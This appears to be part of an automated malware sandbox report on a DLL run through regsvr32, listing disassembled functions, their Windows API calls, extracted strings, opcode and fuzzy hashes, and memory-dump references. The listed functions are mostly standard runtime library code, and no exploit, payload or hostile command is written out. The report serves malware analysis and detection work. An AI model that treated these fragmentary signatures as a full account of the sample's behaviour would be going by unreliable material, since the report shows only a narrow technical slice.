Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3dd4d1e97175dc0a8e4eb0548552863fdddb8d72fbcc94e1e233b366b01ab54e
Instruction ID: 165bf86af381295ff886f847db01daa110407d2c9303d727f47f51b3eac91406
Opcode Fuzzy Hash: 3dd4d1e97175dc0a8e4eb0548552863fdddb8d72fbcc94e1e233b366b01ab54e
Instruction Fuzzy Hash: CA11C6332049012B9A005EF94C85E9A25AFABF6B797350625F335C21C0DF258DC9B123

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6A67, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6E1E6A81
GetLastError.KERNEL32 ref: 6E1E6A8D

Part of subcall function 6E1E6B36: CloseHandle.KERNEL32(FFFFFFFE,6E1E6B80,?,6E1E345B,?,00000001,?,00000001,?,6E1D579E,00000000,00000000,00000001,00000000,00000001), ref: 6E1E6B46

___initconout.LIBCMT ref: 6E1E6A9D

Part of subcall function 6E1E6AF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E1E6B27,6E1E3448,00000001,?,6E1D579E,00000000,00000000,00000001,00000000), ref: 6E1E6B0B

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6E1E6AB1

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: cb8679c858f6eadc3f9921ee9eb0e014d97e1d99268bdf6f64cd61630d4085eb
Instruction ID: bdff76e2f317ad1b2576198dbce14f46ea625a0cebad3e6dcc67384e1758bac2
Opcode Fuzzy Hash: cb8679c858f6eadc3f9921ee9eb0e014d97e1d99268bdf6f64cd61630d4085eb
Instruction Fuzzy Hash: 60F0893A210904ABCF211BD5CC08D467F77FFCA3217148829F75592920CB319890EF21

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6B4D, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6E1C30A1,00000000,?,?,6E1E345B,?,00000001,?,00000001,?,6E1D579E,00000000,00000000,00000001), ref: 6E1E6B64
GetLastError.KERNEL32(?,6E1E345B,?,00000001,?,00000001,?,6E1D579E,00000000,00000000,00000001,00000000,00000001,?,6E1D5D03,6E1C2E1A), ref: 6E1E6B70

Part of subcall function 6E1E6B36: CloseHandle.KERNEL32(FFFFFFFE,6E1E6B80,?,6E1E345B,?,00000001,?,00000001,?,6E1D579E,00000000,00000000,00000001,00000000,00000001), ref: 6E1E6B46

___initconout.LIBCMT ref: 6E1E6B80

Part of subcall function 6E1E6AF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E1E6B27,6E1E3448,00000001,?,6E1D579E,00000000,00000000,00000001,00000000), ref: 6E1E6B0B

WriteConsoleW.KERNEL32(?,?,6E1C30A1,00000000,?,6E1E345B,?,00000001,?,00000001,?,6E1D579E,00000000,00000000,00000001,00000000), ref: 6E1E6B95

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9cd0102a64f72d3f3948e3eec6bfde0637a6faaf472fde0dd8ac2b89d388fe34
Instruction ID: d97d8df498956f06a3ea0116ce9f6a935fcdc9b55cb856018c40bd61c93195b1
Opcode Fuzzy Hash: 9cd0102a64f72d3f3948e3eec6bfde0637a6faaf472fde0dd8ac2b89d388fe34
Instruction Fuzzy Hash: 7EF01C3A620918BBCF625FD1CC089CD3F26FB093A1B448411FF1895520CB32C9A0EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A95D3, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,6E1A9558,00000064), ref: 6E1A95F6
LeaveCriticalSection.KERNEL32(6E221780,?,?,6E1A9558,00000064,?,?,?,6E17DF8B,6E238BE4,000000E4), ref: 6E1A9600
WaitForSingleObjectEx.KERNEL32(?,00000000,?,6E1A9558,00000064,?,?,?,6E17DF8B,6E238BE4,000000E4), ref: 6E1A9611
EnterCriticalSection.KERNEL32(6E221780,?,6E1A9558,00000064,?,?,?,6E17DF8B,6E238BE4,000000E4), ref: 6E1A9618

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: b3054645320ff14e01dfe4780776db3a0bd5a476c6fa657cdf6466cf0cdd9532
Instruction ID: dacb0d94807f4e2fdc25e6f82f938a2fd061ca05c9bc6dbf80e7fbf009600e86
Opcode Fuzzy Hash: b3054645320ff14e01dfe4780776db3a0bd5a476c6fa657cdf6466cf0cdd9532
Instruction Fuzzy Hash: EFE09235100928AFCF011BD4DC08EED3F16EF4A661B118021F50957100CB225AD4ABE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D02A7, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1D06AC
_free.LIBCMT ref: 6E1D0701

Strings

-, xrefs: 6E1D054F

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: 625002e60e8624ae8843063a5188743c7d70c9d6006404c1fb6b29db0b2a628e
Instruction ID: 0b4f0d3992dac66cebda40b9651f50a4ff68908df7e418c9d3e282059d06460c
Opcode Fuzzy Hash: 625002e60e8624ae8843063a5188743c7d70c9d6006404c1fb6b29db0b2a628e
Instruction Fuzzy Hash: 85C1047190021A9BDB60DFA4CC50BEE73BAFF65704F2045AAD819D7180FB319AC8EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E194AEE, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 348COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E194AF5

Part of subcall function 6E19361B: __EH_prolog3.LIBCMT ref: 6E193622
Part of subcall function 6E19361B: std::_Lockit::_Lockit.LIBCPMT ref: 6E19362C
Part of subcall function 6E19361B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E19369D

_Find_elem.LIBCPMT ref: 6E194D07

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6E194B5D

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: e0a5a96982b718d0cb0fc529ca1b3b4ccf35e3431f289e9ce3210e24ff6f6191
Instruction ID: ef5f665ec090b31035121465ba3b72adc2aa58fb067098b6465985b2c6f3f7ec
Opcode Fuzzy Hash: e0a5a96982b718d0cb0fc529ca1b3b4ccf35e3431f289e9ce3210e24ff6f6191
Instruction Fuzzy Hash: 41D1EE35E082898EEF15CFE8C4D0BDCBBB6AF16304F644459D4A56B286DB3499C6FB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B74CC, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1B7637

Strings

+, xrefs: 6E1B7572
-, xrefs: 6E1B7565

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: c5260ad8d2e6d3989865bf75c103e41ea1f43a327e3c4a0c8bf8c655a4d550e1
Instruction ID: 310c3250ccc4e3fddc188e3154b490bca980635ea6f85283b2f8867e54122b54
Opcode Fuzzy Hash: c5260ad8d2e6d3989865bf75c103e41ea1f43a327e3c4a0c8bf8c655a4d550e1
Instruction Fuzzy Hash: 0391B37090424A9FEF14CFED88906EEBB79EF16324F244757E871A72D0D3308981AB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E17DC30, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 231COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E17DC3A

Strings

warm, xrefs: 6E17DCF4
tub, xrefs: 6E17DD6D

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_
String ID: tub$warm
API String ID: 2427045233-333621177
Opcode ID: 6dd7640f6f219a5b0e83199a885df2287d1cb016a1c0d05a2095d2f176294607
Instruction ID: d411e029a2c49e8aec409bb60017c3f6c8ad2e05373fb6de866d61cd79354265
Opcode Fuzzy Hash: 6dd7640f6f219a5b0e83199a885df2287d1cb016a1c0d05a2095d2f176294607
Instruction Fuzzy Hash: 44A1D2B19029558FCF1CCFB8C99A6E8BBB6BB47304F184229D251A7780DB345784DB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CAE6D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E1CAEFD

Strings

pow, xrefs: 6E1CAED5, 6E1CAEF2

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 7c2090f37d07ee508b830fac2e90b439a0ea23c90d0e8699aa67d86f272aca52
Instruction ID: e359c573bc0cf9da538cc5f5c2c92d3f17efc07f75a5fee2beeb247947ad61ea
Opcode Fuzzy Hash: 7c2090f37d07ee508b830fac2e90b439a0ea23c90d0e8699aa67d86f272aca52
Instruction Fuzzy Hash: C4518DA161C5029ACB03AAD4C97039E37E49BA1F00F708E58E496C619CEB7D48D9F6C7

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A8FDE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6E1A913F

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 6E1A909D, 6E1A90D4, 6E1A90D9
-, xrefs: 6E1A916D

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: c7afe2ac1f0879908b74fafbdcbc2803134378facbcdead327cd3f08e4fa9118
Instruction ID: 5ba5db5ac62f8bdc566b0c669fdb1a7eac656ce81edf76d0ee590c2073ed8edd
Opcode Fuzzy Hash: c7afe2ac1f0879908b74fafbdcbc2803134378facbcdead327cd3f08e4fa9118
Instruction Fuzzy Hash: 45514978B0828A5FDB158EEDE8707BE7BFD9F563A0F204459D690D7240C27289C1EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E183DE5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E183DEF

Strings

true, xrefs: 6E183E6E
false, xrefs: 6E183E59

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: 48eccd26271b1a01208347c378ed636d63ec382c19703cacb3340f1c03e13d7f
Instruction ID: c307a085617323ef5260c89ea5b741eccbfb39906fce4bcb72dcdb01de79d3ef
Opcode Fuzzy Hash: 48eccd26271b1a01208347c378ed636d63ec382c19703cacb3340f1c03e13d7f
Instruction Fuzzy Hash: 7F2171B2C00204EFDB14DFE1E844ADF77B8AF54710F14496AE815AF240EB30D985EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E194F4E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E194F55

Strings

true, xrefs: 6E194FBF
false, xrefs: 6E194FAC

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: 3d68e3b9bd0ca3f924db88bbc280553d69b2c9cc732b1bbd2c742f132c35f77b
Instruction ID: 34660cdc78a9c11c1058243fbec82c809aac42dc343b214e0e64862c656faa77
Opcode Fuzzy Hash: 3d68e3b9bd0ca3f924db88bbc280553d69b2c9cc732b1bbd2c742f132c35f77b
Instruction Fuzzy Hash: C411BE75800741AEC724DFF8E480BCABBF8AB15604F00891AE1A6DF640DB30A58AEB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E18160C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E181613
_strlen.LIBCMT ref: 6E181626

Strings

[json.exception., xrefs: 6E181621

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_strlen
String ID: [json.exception.
API String ID: 782648989-791563284
Opcode ID: 26006c397f0edee700d7933de8319021c640883b85e437f690e6c94c3837ec7a
Instruction ID: dc3c4694c8c5fa69170fabe3c45f0e6413523d5818a9cdb7611d07cb77fd86ad
Opcode Fuzzy Hash: 26006c397f0edee700d7933de8319021c640883b85e437f690e6c94c3837ec7a
Instruction Fuzzy Hash: F4F090757001059BEB08DFD8D814BBFB77ABB80725F204A4CE0219E281CBB599C5ABE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E18166D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E181674
_strlen.LIBCMT ref: 6E181688

Strings

cannot use operator[] with a string argument with , xrefs: 6E181680, 6E18168F, 6E181690

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_strlen
String ID: cannot use operator[] with a string argument with
API String ID: 782648989-2766135566
Opcode ID: 1f1232b47e8d8bee984d95168df70e245f59b6ba44cf058bbd6de1defcfae714
Instruction ID: faac7330eb0596b70fd59c179ad826ca1e0c7114a6d3a341b01bcd3660984873
Opcode Fuzzy Hash: 1f1232b47e8d8bee984d95168df70e245f59b6ba44cf058bbd6de1defcfae714
Instruction Fuzzy Hash: 3AF08CB0A003189FDB10DFE8D8449FFBA78AF04748F10092DE005AB240C7714E80EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1815AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1815B3

Part of subcall function 6E18433B: __EH_prolog3.LIBCMT ref: 6E184342

Strings

Seaso, xrefs: 6E1815BF
D n, xrefs: 6E1815E7

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: D n$Seaso
API String ID: 431132790-1730723312
Opcode ID: d568372114c99a804755d8d4f78f7d8f420e3e3f06f19a3d69a4031e5c5a9ac6
Instruction ID: 214698709293c9d2a73efbaa0e3c74ce98a5bb6b60014658c5586ad30ea20bb7
Opcode Fuzzy Hash: d568372114c99a804755d8d4f78f7d8f420e3e3f06f19a3d69a4031e5c5a9ac6
Instruction Fuzzy Hash: C1E06DB4810129AFDB01DBD8C819BFFBA78AF14204F008509A5556F241D7B11AC2FBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E18155B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E181562

Part of subcall function 6E1843F3: __EH_prolog3.LIBCMT ref: 6E1843FA

Part of subcall function 6E1842F3: __EH_prolog3.LIBCMT ref: 6E1842FA

Strings

Steam Whe, xrefs: 6E18157B
D n, xrefs: 6E181597

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: D n$Steam Whe
API String ID: 431132790-3448961164
Opcode ID: 0227525f3b0f1d6cef3bd9f1821f3f1300c97aba97e810853c49d4d04d41ff1e
Instruction ID: 871ee901867a3af17ffd7fe805ee554bebc4166c00f85cbe4ff2de80eadc9e42
Opcode Fuzzy Hash: 0227525f3b0f1d6cef3bd9f1821f3f1300c97aba97e810853c49d4d04d41ff1e
Instruction Fuzzy Hash: 54E06574800258DACF06EBD8C4047DEB6396F10314F144549E1517F190CB754BC5FBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1842F3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1842FA

Strings

D n, xrefs: 6E18430C
Steam Whe, xrefs: 6E184314

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: D n$Steam Whe
API String ID: 431132790-3448961164
Opcode ID: 2dd90b6676f4777a369a2b3b62ed00a85960e4710e6b9c95dc85375b82812ab2
Instruction ID: 12be3b30b3876400ce66c399ddb4000bc4687cb7512e278d9d19004ec26f04c8
Opcode Fuzzy Hash: 2dd90b6676f4777a369a2b3b62ed00a85960e4710e6b9c95dc85375b82812ab2
Instruction Fuzzy Hash: A2E0EDB48102199BCB00DFD8C446AEEFB7DAF40324F104609A622AF280C7745AC1ABD5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 4792 Parent PID: 6092 regsvr32.exeCOMMON

Executed Functions

Function 6E18FB55, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E18FB5C
std::locale::_Init.LIBCPMT ref: 6E18FB7D

Part of subcall function 6E1911F3: __EH_prolog3.LIBCMT ref: 6E1911FA
Part of subcall function 6E1911F3: std::_Lockit::_Lockit.LIBCPMT ref: 6E191205
Part of subcall function 6E1911F3: std::locale::_Setgloballocale.LIBCPMT ref: 6E191220
Part of subcall function 6E1911F3: _Yarn.LIBCPMT ref: 6E191236
Part of subcall function 6E1911F3: std::_Lockit::~_Lockit.LIBCPMT ref: 6E191276

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: ee959b77c37350282e1fea506bcce25bb3abf05dd4ca9061965ea583c2a7414d
Instruction ID: 09987e9762f7f90e9a188363d40d714d3fa9c6d58b2f85fbe32e05a0ac100dca
Opcode Fuzzy Hash: ee959b77c37350282e1fea506bcce25bb3abf05dd4ca9061965ea583c2a7414d
Instruction Fuzzy Hash: BCE0DF36A11A115BD211ABECA4213ADB6997F88B24F710409E521AF680CFB18DC0BB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D16BE, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E1D16FF

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3a95ff3f2b4926f66483811f5c5ace3b1c3ee5431b7afa0078749c5059debb66
Instruction ID: 83a5510ecc080a0dbb65f974bdeecef91a58e63cee46ebc0fa59ab773b43f5d0
Opcode Fuzzy Hash: 3a95ff3f2b4926f66483811f5c5ace3b1c3ee5431b7afa0078749c5059debb66
Instruction Fuzzy Hash: 92F024363046355BEB518BEA8814E8B376DAB52670B258511EE24D7090CB60D9CCB6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1C1E, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 6E1D1C50

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8cba79b8b93897199e427721877e91c04280613a9ede413152f32451dfc77e37
Instruction ID: e74214fedc3a850539fe17fde2db548440392ed8e89d25507b3e71a89acdc112
Opcode Fuzzy Hash: 8cba79b8b93897199e427721877e91c04280613a9ede413152f32451dfc77e37
Instruction Fuzzy Hash: B8E0E5353446315AFA1017E99C14B8B3B4C9B126A0FA10510ED1496190CB20E8CCF1A5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

